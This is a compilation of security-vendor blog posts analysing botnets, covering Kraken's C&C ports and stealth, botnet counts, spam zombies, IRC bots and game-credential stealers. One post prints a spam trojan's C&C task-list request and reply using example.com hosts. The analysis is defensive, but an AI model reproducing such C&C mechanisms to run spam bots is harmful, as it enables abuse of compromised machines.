Over the past week, Mailbot.f (a.k.a “Kraken”) was thoroughly studied and reverse engineered by various security researchers. As mentioned in my previous blog, we focused mainly towards the network behavior of the bot and observed a few interesting things.

After the bot installs on a victim machine, it attempts to contact mx.google.com via TCP destination port 25 (SMTP) 3 times. This looks to be a network connectivity test by the bot. If this test fails, the bot does not send out any spam at a later stage. (Note that the bot does not use mx.google.com to spam). Next, the bot downloads the front page of 3 different popular web sites (mostly news sites), such as nytimes.com, cbsnews.com, news.com, cnn.com, reuters.com, msn.com, google.com, etc. We have not observed the use of these web pages in the spam sent out by this bot, however.

The bot then tries to find its peers and communicates with them. If it is an older version of the bot, it uses UDP destination port 447 to communicate with the peers, sending information such as the bot version, outgoing smtp connectivity status and other machine specific information such as hostname, operating system, uptime, language, CPU specs, memory information etc. It also communicates the current modules and their versions. The older version of the bot then downloads an update from its peers by connecting on TCP destination port 447. We have observed that this update is around 100 to 200 kbytes. The bot then updates itself.

The new version of the bot (or updated bot from the previous step) contacts its peers using UDP on random destination ports and sends similar information as in the previous step. It then connects to one of the peers to update its modules using TCP destination port 80. If the peer is available on port 80, the bot communicates using HTTP POST messages and receives the updates from its peers.

In the case when the peer is not available on TCP port 80, the bot communicates on TCP destination port 443 to download the module updates. Though it communicates using TCP port 443, the data is not SSL.

The bot then downloads other modules from its peers, such as spam template, spam payload, and mx server addresses, etc. With this information it starts sending out spam email. After sending out a batch of spam, it downloads further updates and sends out spam again.

We made the above observations after looking at a number of Mailbot.f samples. Most of these samples were either v315 or v316 (as derived from the bot client registration packet). All of the command & control (c&c) communication is encrypted and we were able to decode some of the c&c communication using the wireshark plugin referenced by mnin security blog. Since the bot can be updated, at will by the bot author, some of these observations may/can be changed at any time.

Given that the bot uses

• encrypted data
• random UDP destination ports with random size packet payloads
• legitimate HTTP protocol on TCP destination port 80
• communication on TCP destination port 443

its c&c communication is very stealthy and difficult to detect. Although the bot is currently being used to send spam email, the stealthy c&c communication and the update infrastructure already in-place can pose a greater threat if used for more devastating purposes.

After the recent interest in Kraken bot by various communities, Gaurav Dalal, Denys Ma, and I have been observing the network behavior of the bot very closely.  About 2 weeks after the initial analysis from SANS, it seems like the bot author has seeded the bot with an update via TCP port 447. The updated bot now uses a stealthier command and control (c&c) mechanism that will evade previously proposed detections. The updated bot no longer uses UDP port 447 with 74 bytes of payload. After the bot updated itself, we observed that it uses UDP packets with random ports and also random packet payload lengths for its c&c communication. All of this c&c communication is encrypted. As a surprise, we also noticed that the updated bot now uses the well known HTTP protocol on TCP port 80 and 443 to send and receive encrypted c&c communication data. More interestingly, the communication on port 443 is encrypted but non-SSL. The process of the upgrade and also the c&c mechanism itself seems to be very interesting. We are continuing our research and will update this blog with more technical information soon.

As I was recently asked about botnet figures, I revisited our collections to establish some trends in this area.

In 2004 and 2005, bots were placed in a separate group of their own, separate from viruses and Trojans. Their names often ended with « bot » (W32/Sdbot, W32/Spybot, W32/Gaobot…). Based on the number of separate variants we had in our collections (the zoos) at the time, statistics showed a constant increase.

We have noted since then that a lot of malware has a remote-control feature (i.e. they are bots). Whether we are dealing with worms, viruses or Trojans, they are designed to receive commands and execute them at some point in their life. As of today, much of this remotely-controlled malware are known under various malware family names (W32/Nuwar, W32/Mytob, Spam-Samburg, Srizbi, Backdoor-DIX, etc.). Consequently our counting methods have to change.

On the Internet, various websites allow us to measure a different aspect of the threat.

For example, the Shadowserver Web Site shows us a botnet count. The following graph is a count of all the active Command and Control (C&C) servers the Shadowserver Foundation is aware of. There are approximately 2900 botnets today compared to 1400 one year ago:

Counting the infected computers is a much more arduous task. In January 2007, I reported on Vinton Cerf’s talk at the World Economic Forum in Davos, Switzerland and explained that he estimated 100 or 150 millions machines as infected represented over 10% of the PCs connected to the Internet. At the same time, some sources estimated less than 10 millions machines when others say they identify nearly 250000 new bots, or infected IPs each day.

Various techniques can be used to track zombie machines. I will only quote one to allow me the opportunity to give you some interesting links:

1. Observing DNSBL queries
   Method is exposed in a white paper from the College of Computing, Georgia Institute of Technology. It is based on the insight that botmasters themselves perform DNS-based blackhole list (DNSBL) lookups to determine whether their spamming bots are blacklisted or not. There are techniques and heuristic rules to distinguish botnet DNSBL reconnaissance queries from valid DNSBL traffic performed by legitimate mail servers.
2. Watching IRC traffic
   It is one of the simplest methods of detecting IRC-based botnets. It involves sniffing IRC traffic and searching for any signatures matching known botnet commands.
3. Checking Behavioural Characteristics
   As an example, researcher Stephane Racine demonstrated that IRC bots were idle most of the time on a Chat IRC channel but responded faster than a human upon receiving a command.
4. Searching for malware hashes on P2P networks
   With decentralized Peer-to-Peer botnets, compromised nodes on the network can be identified by their retrieval of hashes known to be associated with botnets. The College of Computing and Informatics University of North Carolina at Charlotte proposed this method for tracking W32/Nuwar (alias Storm) infected machines. To determine which search hashes are pertinent, the bot could either be actively running on a network without a true Internet connection to determine current hashes, or the hash generation algorithm could be extracted from its binary to generate hash sets on the fly based on the limited set of random integers and the current time.
5. Watching attack traffic
   Analysing the traffic linked to massive spam distribution or DDoS attacks can reveal the amount of compromised computers. Since January 2008, the Shadowserver graphs demonstrate a huge increase in this field.

To conclude this post, I have to say that looking at these studies did not help me in calculating how many computers are, at the moment, affected by bots! Extrapolation between 120000 or 150000 items known as active in a botnet at a given moment and a total number is hard to envisage… However, making these searches was not useless. We can certainly predict an increase in DDoS attack will be a 2008 issue and, for sure, more and more botnet will be used in the field ; perhaps 40 or 50% of them.

In the “good old days” spammers aggressively scanned the Internet for open relay servers to send spam. Open relays are out of fashion these days. So much so that the Open Relay DataBase is shutting down due to changes in spammer tactics.

Today’s spammers, in collusion with malware authors, infect thousands of machines on the Internet turning them into spam relay zombies. These zombie machines connect to a web server controlled by the spammer, which provides a constantly updated live feed of email addresses and content to spam. The content could be anything from pump-and-dump stock spams, online pharmaceutical drugs or the usual penis enlargement. Each individual zombie machine is capable of sending hundreds of spam emails per minute depending on the bandwidth available. Example: Spam-Maxy, Spam-Loot

And with more machines having access to broadband and ADSL connections, it provides a fertile breeding ground for this unholy alliance of malware authors and spammers to take advantage of.

At McAfee Avert Labs Bangalore, we sampled emails that were captured by our honeypot this quarter. The following chart shows the content of the email messages captured during in-house live testing of malware:

Only 11% constituted executable attachments. 2% were mails containing infection notifications or captured cached passwords that were meant for the trojan author. The rest, some 87%, was spam. A high percentage of this spammed content was image spam and ASCII art; techniques that spammers have effectively used to subvert traditional detection by anti-spam vendors.

Although we have seen malware-controlled spam networks in the past, most notably the W32/Bagle and W32/Sober families, the complexity and sophistication seen in the W32/Stration and Spam-DComServ trojans of today, demonstrate the alarming advancements made by these digital miscreants. McAfee Avert Labs continues to keep a close watch on these recent developments in the spam world.

Technologies advance with time, and so is the case with Instant Messengers. Not long ago, people were happy sending text messages. Then VoIP came along and changed the scene. Soon after IM vendors embraced it. Many IM clients are now VoIP enabled. As soon as VoIP started going deeper into the mainstream, security researchers warned of related issues. One issue was abuse with spam, usually referred to as SPIT. Wikipedia states SPIT is “as-yet-nonexistent problem“. As VoIP is getting more popular the scenario is changing fast, this “as-yet-nonexistent problem” is slowly but surely emerging. The following images shows a real-world VoIP spam over Skype.

The image shows a typical spam prospect. The spammer starts a conference call with some random users and starts playing the spam message. This process is most likely not manual but automated with bots.

Use and abuse are two sides of the same coin and this technology is no exception. All major IM providers are giving away SDKs to develop add-ons. However these SDKs also lower the bar for spammers to develop bots. We have witnessed the same with the ongoing development around Skype malware.

The image below shows the assembly code for the loop which is used by Skype malware to search for users. You will notice the “SEARCH USERS” Skype APIs:

The malware actually uses more of these. The image below will highlight those:

These APIs are part of Skype SDK and are documented by skype. It is just a matter of time before we start seeing bots, in the wild build on top of IM SDKs provided by the vendors. We advise users to be aware of this developing attack vector. McAfee Avert Labs is prepared for this battle!!

Malware authors have been pro-active in including exploit code for almost every new vulnerability reported into bots with utmost professionalism. Apart from the numerous Microsoft windows vulnerabilities where exploit code has been methodically incorporated into bot code, McAfee Avert Labs is seeing a trend where popular applications from software vendors are being targeted. In recent weeks we have seen bots that target vulnerabilities or weak passwords in the following applications:

Famatech Remote Admin http://vil.nai.com/vil/content/v_140984.htm
Symantec Antivirus http://vil.nai.com/vil/content/v_140978.htm

Although the vulnerabilities in the above software are dated and patches available, bot authors still found them enticing enough to target machines running vulnerable versions of the these software applications.

Other popular software applications with vulnerabilities that have been targeted by bots in the recent past include:

• CA BrightStor
• Dameware
• MySQL
• WU-FTP
• VNC

Most of the major software vendors like Adobe, Microsoft and Oracle now follow a monthly patching cycle and administrators have their hands full in ensuring that every machine on the network is patched. Sadly, most administrators do not have the flexibility to deploy patches immediately to machines on the network for policy reasons. For example, the organization could be using legacy software which could break if a new service pack was applied and keeping these legacy applications running takes precedence over applying the latest hot fixes. In rare cases a fix could break something else in the operating system or adversely affect other applications. Administrators need more time to first deploy these hot fixes in a test environment and QA them properly before deploying them to the entire enterprise.

Given the trend where malware authors are expanding their attack horizon by targeting vulnerable software applications, it wouldn’t be surprising if an exploit directed at popular instant messaging (IM) clients should surface. IM is popular both in consumer and corporate networks and an exploit that gives remote shell on a machine running an instant messenger would be stunningly effective.

That being said, it will be interesting to wait, watch and revisit this topic if and when an instant messenger remote shell exploit surfaces.

Today, Avert Labs announced the availability of its podcast on the “Top Ten Security Trends in 2007”.

As part of this podcast, McAfee will identify those threats it believes businesses and consumers will face in 2007 as computer criminals become more organized and professional in their approach.

Download the podcast

Ever wondered how a trojan infected computer gets its orders to spam? Take a peek with me into one trojan’s junkmail activities. The following account is happening as I type, and shows that some image spam is not unique even though it appears to be random.

The smtp sending trojan first phones home for its task list, via http on the smtp port (25). Port 25 on the host machine is running Apache/1.3.37 — this is a very unusual place to find apache running.

The task list looks like this:

$GET "http://example.com:25/outtask/urlTask8_c_2.txt?id=MAGID-ID-STRING&flag=1"
10
12|http://serv2.example.com/outtask/tasks/task_12_letter_1162390208.txt|
http://get.example.com:8092/cgi-bin/cgi2.cgi|
http://serv2.example.com/report2.cgi|1||
http://mail.example.com:8888/cgi-bin/put|

20|http://serv2.example.com/outtask/tasks/task_20_letter_1162390209.txt|
http://get.example.com:8091/cgi-bin/cgi2.cgi|
http://serv2.example.com/report2.cgi|1||
http://mail.example.com:8888/cgi-bin/put|

22|http://serv2.example.com/outtask/tasks/task_22_letter_1162390209.txt|
http://get.example.com:8092/cgi-bin/cgi2.cgi|
http://serv2.example.com/report2.cgi|1||
http://mail.example.com:8888/cgi-bin/put|

^{(line breaks and spaces added for readability)}

The response it got is in the following format:
“tasknumber|spam-text URL|Address-list URL|Report address|1||Report address2|”

So in the example above, the bot got 3 tasks. We’ll take a look at the first one in more detail….
Read the rest of this entry »

There’s something that I’ve been hearing mentioned a lot lately, particularly from those in law enforcement circles - the importance of “mules” in bot-related money making schemes. These are work-at-home type jobs which are offered through very professional-looking websites, through classified ads, and even through IM.These are a crucial part of the reason so many bots are able to be run from places around the globe. In order to get merchandise (often to re-sell) or cash with stolen credit card credentials, the thieves have to go through more strict regulations if the goods are going to another country. To get around these regulations, they use these mules within those originating countries.

These mules are often someone who’s desperate for money or someone who figures it’ll be the (unfortunately fictitious) company who’d get in trouble rather than themselves, so they tend to ask few questions of their “employers”. Laws in most countries are better able to handle this sort of trafficking of stolen goods, so it tends to be these small-time players who are most often prosecuted within the web of illegal botnet activities.

There’s been discussion lately about whether we’ve already lost the war against malicious bots. Certainly things are looking fairly grim as the rise in the number of variants of IRC bots has grown by leaps and bounds over the last couple of years. Strictly using string-based detection against the unending tide certainly appears to be a lost cause.

On the other hand, there are some more promising developments in recent years:

• Most AV vendors at this point have gone to using some sort of generic detection or behavior-based heuristics against the most popular bot-families, which can proactively detect a certain amount of new bots
• Firewalls and IDS/IPS products are becoming more widely used, even by home users
• Many corporations are blocking IRC traffic
• ISPs are increasingly involved with security groups that have developed to shut down Command & Control channels used by bots

From my perspective, I see a few things being particularly important in solving the bot problem:

• Further cooperation of security companies and ISPs in order to get more C&Cs shut down
• Further cooperation of security companies, ISPs and Law Enforcement agencies in order to ensure more bot masters face legal action
• ISPs offering more security services than simply AV software (i.e. traffic filtering)
• More security information being available to novice users (i.e. http://pbskids.org/license/)
• More accountability for adware vendors who fund these malicious affiliates
• A paradigm shift, particularly in the home user area, to a security strategy of strategically allowing known-good traffic rather than strategically blocking known-bad traffic

What are your thoughts on the general state of things?

Have the Bot Wars been lost? What more could be done to ensure that Bot Masters don’t make the internet completely unusable?

Today’s mass mailers are often seeded from thousands of zombie drones connected to botnets. Time on a botnet can be bought, for the right price, to launch the next mass mailer variant. Then when these zombies are instructed to download and execute a worm, a mini outbreak can be created when thousands of machines over the internet simultaneously start mailing copies of the worm. However, these artificial outbreaks die by themselves when antivirus vendors come out with updated detection for the worm.

By using enticing subjects and message bodies and spoofing the ‘from’ address to appear from trusted sources, mass mailers have traditionally depended on social engineering techniques to get a victim into executing a malware attachment. Given that mass mailers seem out of vogue these days with malware authors focusing on more effective infection vectors like operating system or browser vulnerabilities, it’s nostalgic when we see a new “old” kid in town.

W32/Stration is a mass mailer that has been around since August this year and is one of the few active and evolving mass mailers in recent times. Very typical of the mass mailing variety, W32/Stration harvests email addresses from an infected machine and mails a copy of itself using some convincing message bodies.

A sample spoofed email message is as follows:

“Our firewall determined the e-mails containing worm copies are being sent from your computer. Nowadays it happens from many computers, because this is a new virus type (Network Worms). Using the new bug in the Windows, these viruses infect the computer unnoticeably. After the penetrating into the computer the virus harvests all the e-mail addresses and sends the copies of itself to these e-mail addresses. Please install updates for worm elimination and your computer restoring.”

Leaving out the poor grammar, such a dire message appearing to come from the administrator of your company could be stunningly effective in getting uninformed users to take the bait.

W32/Stration uses a self updating mechanism to keep itself going. Infected machines connect to a hard coded url in the body of the worm to download possibly a newer version of the worm and execute it. This ensures that worm remains undetected for an extended period of time and ensures a longer shelf life in the wild.

The author seems to be investing considerable time and effort into unleashing newer variants of W32/Stration on to the internet. But it’s surprising that no lucrative payloads like adware or password stealing trojans have been seeded onto infected machines. One can only wonder about the objective behind developing and releasing newer variants of this worm. Is the current wave being used to build a massive pool of infected computers for a larger scale of attack on the internet? Sadly, the motive behind unleashing this worm is still unknown at the time of writing this blog. McAfee Avert Labs continues to keep a close eye on future developments of W32/Stration.

The online gaming industry has matured into a serious business with revenues running into the billions of dollars. As we know, once something gains popularity on the Internet and is profitable, it becomes an attractive target for hackers.

In the early days, game crackers spent quality time breaking cd protection or gaining secret codes to unlock hidden weapons and levels. With the advent of both Online Games and Massively-Multiplayer Online Role Playing Games (MMORPG), official gaming networks now require legitimate cd keys and/or registered accounts to logon and play online. Virus authors responded by unleashing a rash of trojan horse programs masquerading as game cheats or trainers in order to steal cd keys of Online Games. To get a victim to run these trojans, these files were posted on bulletin board systems, internet relay chat channels or on popular gaming site forums. But the intended victim still had to download and execute the trojan for the ploy to work.

So the obvious question was “How to make a self spreading game cd key stealer?” Sdbots and Gaobot with multiplying capabilities via exploits and weak passwords were readily available at that time. It wasn’t long before a module was written and introduced in the bot code to steal game cd keys of popular online games from Electronic Arts, id Software, Red Storm and Valve. Fortuneately most of the bots in the wild these days have dropped this functionality as the popularity of some online games has waned recently.

Massively-Multiplayer Online Role Playing Games like Lineage, World of Warcraft and the Final Fantasy series rule the gaming world today with an insane number of hardcore
gamers competing against each other in the virtual world. Everyday, McAfee Avert Labs receive numerous malware samples designed to steal game account information targeting popular game titles. And in a shift away from trojan horse programs masquerading as game cheats, we are seeing a trend where virus authors are writing old school viruses like W32/Bacalid, W32/Detnat and W32/Philis that target popular role playing games.

Are these guys doing it for the love of the game? Nope.. sounds too good to be true. Underground RMT (Real-Money trading) groups thrive in dealing with stolen game accounts and operate mostly out of Asia. And with a player’s stolen account information, their virtual assets can be transferred to another players account or simply auctioned off and sold for real money. This phenomenon is currently region specific but could easily reach menacing proportions similar to the threats plaguing online internet banking.

A vast majority of IRC based bots seen these days can be said to be on “Autopilot” in a sense. After joining a pre-defined IRC channel the bots read channel topics and accept them as commands. Authors of such bots just need to set these channels up with correct commands and then leave it up to the bots to spread and possibly go and earn money for their authors.

In general, such bots perform the following steps

1. Query for the domain where the IRC server resides
2. Try to connect to an IRC server at some predefined set of ports
3. Once connected to the IRC server , join a predefined channel by issuing “JOIN =C2=BCbr /> “
4. Read the topic for the channel and accept it as a command

Generally, the topic of the first channel instructs the bot to join other channels, the topics of which may in turn cause the bot to execute various commands or further join more channels. The major functions that such bots generally perform for their author are i) Spread: increase the size of a botnet by scanning the network and infecting other vulnerable machines. ii) Earn money: by downloading adware, stealing personal information etc.

Different bots may connect to different domains, ports, channel names and may download different adware etc but the overall working mechanism remains the same: once the channel topics have been set, they all go about on their own adding more machines to botnet and earning money automatically. While his bots are on autopilot the author may have fun relaxing or may be spend his time on things like researching new vulnerabilities to exploit rather than just sitting in a channel and issuing the same commands to each new machine that joins.

Some such bots have a funny side too, where they would display funny messages along with the IRC banner returned. One example of such bot is W32/Sdbot.worm.gen.h which connects to forum.ednet.es at port 4915. The channel is still active at the time of writing. Click here to see a screen shot of the message returned from the server.

McAfee Avert Labs has been observing such behavior lately and it has also talked about recently. Even though it claims to be one, it is not a “legit botnet”. It will happily issue commands to a bot to scan the network for vulnerable hosts and infect them. Actually, it is as insidious as any other botnet.

One can only see this message by connecting to the server using an IRC client or looking at the bots communication in an ethereal dump. A normal user, whose machine is infected, will not see this message. So, whom is this message intended for???

Possibly it is just intended for the “readers” who analyze such threats. Like, every once in a while we see a malicious executable which has a few strings just for fun or to challenge the person who is analyzing the memory dumps. Similarly I think this is just the fun part which the malware authors and AV researchers share.

Or, if you like, it can be called a social engineering technique which malware writers may use to attempt to fool “readers” to believe that this channel, even if part of a botnet is actually legal. It is, however unlikely to stop researchers from adding detection for such bots nor will it prevent the IRC channel from being taken down once discovered.

Such “special” responses could also potentially be used to obfuscate/encode information being conveyed to the bot.

Everyday we see different things that the miscreants develop to make their job easier. Today I was checking the 288th variant of Opanki. The really interesting thing about this one is that the botnet owner seems concerned over not having an organized way to check the bots, like geographic distribution, for example. But how can he or she accomplish this in an easy way? Yes, Google Analytics! As many of you know, Google offers Google Analytics (www.google.com/analytics) as a free service that allows anyone to keep collect and view tracking information about website visitors, like Unique Visitor Tracking, Daily Visitor, Geo Location…

The following code was found on this bot variant. This is typical code that one would usually add in to a webpage to make Google Analytics work:

_uacct = "UA-XXXXXX-X";

_udn="xxxxxx.com";

urchinTracker();

The _uacct and _udn are parameters that identify the site owner for later statistics.

Yet another example of how the miscreants are organizing themselves…

An epic transformation in the world of security is upon us. Today, we released the first issue of our semi-annual security magazine Sage. We will leverage this communication vehicle to deliver meaningful and sometime raw content to the masses. We take our responsibility to protect the public from malicious malcontents very seriously and will not shy away from difficult content or taboo topics. Instead, we will share with the world our day-to-day fight and let you decide how important the concepts being broached are to you.

The premiere issue examines the use of open source by the malware writing community. We show the pivotal role that code sharing and full disclosure have played in the evolution of the threat environment, and we anticipate a surge in malware quality and reliability as the malware writers become more professional. Though open source cannot be blamed for how some unsavory individuals may choose to use its tools, techniques, and methodologies, the movement should acknowledge that there are dangers associated with some of its fundamental beliefs.

Sage is meant to be a forum for thought leadership and serious discourse on topical security issues. By drawing on the Labs wealth of data and expertise, and writing challenging security articles, we hope to provoke important discussion about the digital battlefield we have found ourselves in.

Get Sage now from the McAfee Threat Center site:

http://www.mcafee.com/us/threat_center/white_paper.html

Rockets bursting in air, fireworks everywhere!  Thank you for helping mark the 200,000^th entry into the VirusScan malware (malevolent software) detection database.

But truly, this is not a moment to celebrate.  For, larger and larger numbers of malware is a plague, not a cause to celebrate.  Instead, we mark this moment simply as a milestone in our continual trip to fend off the bad stuff from everyone's machines.

It is alarming that we reach this milestone so soon after September 2004 when the count reached 100,000.  Eighteen years to reach 100,000.  Less than two years to double.  Looking ahead, our researchers expect yet another doubling in a similar timeframe.  So, 100,000 new threats in the past two years, 200,000 new threats to come in the next two years!

 Malware Count and Rate of Growth
 

The last two years have marked a tremendous increase in downloaders and bots, malware that has as its purpose to commandeer the target machine, to be used by the Command and Control machine.  Or rather, the person sitting behind that machine, who has as his motive, $$$$$$$.

In early 2004, a number of viruses like Netsky, Bagle, and Mydoom would infect multiple millions of machines with each release of a new variant.  Many millions of machines would be compromised in a short amount of time causing great financial strife and immediate reaction from IT personnel as well as law enforcement.  Soon, Sven Jaschan was arrested for the creation of the Netsky and Sasser families of viruses.  At about the same time, the author of Gaobot/Agobot and Phatbot was also arrested.  With these two events, we all hoped the arrests would stem the tide on malware.

Instead, malware distribution changed dramatically.  In the first half of 2004, 31 virus outbreaks were rated Medium and above.  The second half of 2004 saw 17 more.  That number fell to 12 for the whole of 2005.  And in 2006, there have been no outbreaks of similar severity!  Instead of huge virus events causing ire from all segments including law enforcement, the preferred method of malware distribution now involves the creation of many minor variants sent through controlled spam efforts.  Good family detection becomes crucial for a less worrisome experience on the Internet.

Another area of concern is the growth of malware targeting mobile telephony.  The numbers are still small, only near 300.  As a result, rates of growth are exaggerated.  However, it will grow.  The worry, as our past experience would show with other forms of malware, the growth will fashion similarly to the above graph.  Except, time will be compressed.  We are still in the era where malware targeting telephony is not yet purposefully stealing money.  And that is the concern.  When the phone becomes the standard means to transfer money, malware targeting telephony will truly explode, much as bots and other means to steal money over the Internet have consumed our energies these past two years.

And so, on this July 4^th, our thanks to the men and women who serve, so we can all enjoy our liberties and pursue happiness.  And thanks also to the cadre of dedicated anti-malware researchers who on this day added that 200,000^th malware detection entry, so we may pursue our enjoyment of the Internet experience with a little less worry.

In October 2004, the Federal Trade Commission started an investigation of reputed spammers. This story just finds a conclusion on May 4th, 2006. Sanford Wallace (nicknamed Spamford) and his company, Smartbot.net, have to shutdown their operation and give up to more than $4 million in ill-gotten gains. Jared Lansky, an ad broker who disseminated ads containing Wallace's spyware, will give up $227,000 in ill-gotten gains.

The FTC alleged that Sanford Wallace and his company, Smartbot.Net, exploited a security vulnerability in Microsoft's Internet Explorer's Web browser in order to distribute spyware. The spyware caused the CD-ROM tray on computers to open and then issued a "FINAL WARNING!!" to computer screens with a message that said :

If your cd-rom drive's open . . .You DESPERATELY NEED to rid your system of spyware pop-ups IMMEDIATELY! Spyware programmers can control your computer hardware if you failed to protect your computer right at this moment! Download Spy Wiper NOW!" Spy Wiper and Spy Deleter, purported anti-spyware products the defendants promoted, sold for $30.

The official documents are available here :

May 4, 2006 :

• Stipulated Final Order for Permanent Injunction and Settlement of Claims for Monetary Relief As To Defendants OptinTrade, Inc. and Jared Lansky
• Order of Default Judgment, Permanent Injunction, and Other Equitable Relief Against Sanford Wallace and SmartBot.Net, Inc.
• News Release

October 12, 2004 :

• Complaint for Injunction and Other Equitable Relief [PDF 34K]
• Memorandum in Support of Plaintiff's Motion for a Temporary Restraining Order with Expedited Discovery, Preservation of Documents and Order to Show Cause Why a Preliminary Injunction Should Not Issue Against Defendants [PDF 68K]
• News Release

An interesting few variants of an IRC bot, named http://vil.nai.com/vil/content/v_139347.htm. Rather than connecting back via DNS to an IRC server for receiving commands, the bot attempts to create a P2P network, listening on port 8 (TCP). Initial execution results in outgoing connections to one of several IP addresses (on port 8 TCP), presumably some seeded infections to spawn the P2P network. The bot spreads via email, AIM, Windows messenger and across the network.

One interesting aspect to this family is its (supposed) ability to repack itself. Though unconfirmed in replication testing thus far, reports suggest it attempts to repack itself prior to propagating. If true, would create an interesting challenge for AV scanners.

A couple weeks ago we saw a blog posting by a person named tibbar claiming they had written the first kernel mode IRC bot. See http://tibbar.blog.co.uk/2006/04/06/kernel_mode_IRCbot~708256 for the announcement.

Is this really the first kernel mode bot? I think so, but it is purely a proof of concept with no teeth. What makes this announcement important in my eyes is that it illustrates two points that are very important when we look at the future production of bots and malware in general: Use(and reuse) of open source components and the increase in programmer skillsets.

This kernel bot was easily created because it utilized a kernel socket library written and placed in the public domain by Valerino on rootkit.com (Click here for the rootkit.com post). As The Mythical Man Month states, there is no silver bullet in software development but the brass bullet is module reuse, which we are seeing more and more within malware. Would this kernel bot have been created if it wasn’t for the prebuilt components that were available?
The second important point is that the code organization of the project allows for testing the IRC functionality of the kernel bot in usermode where a lot of bot developers are more comfortable, therefore, easing the development of variants with more IRC functionality. Is this a revolutionary ability? No, but it is more advanced than most bot developers. I believe the advancement of skillsets will lead to more destructive bots as more intelligent programmers spend time increasing bot code quality, advanced features (encrypted P2P using proper key exchange for example) and test harnesses. Malware, bot development specifically, will start to exhibit the standard development life cycle seen in other open source projects such as Apache and firefox.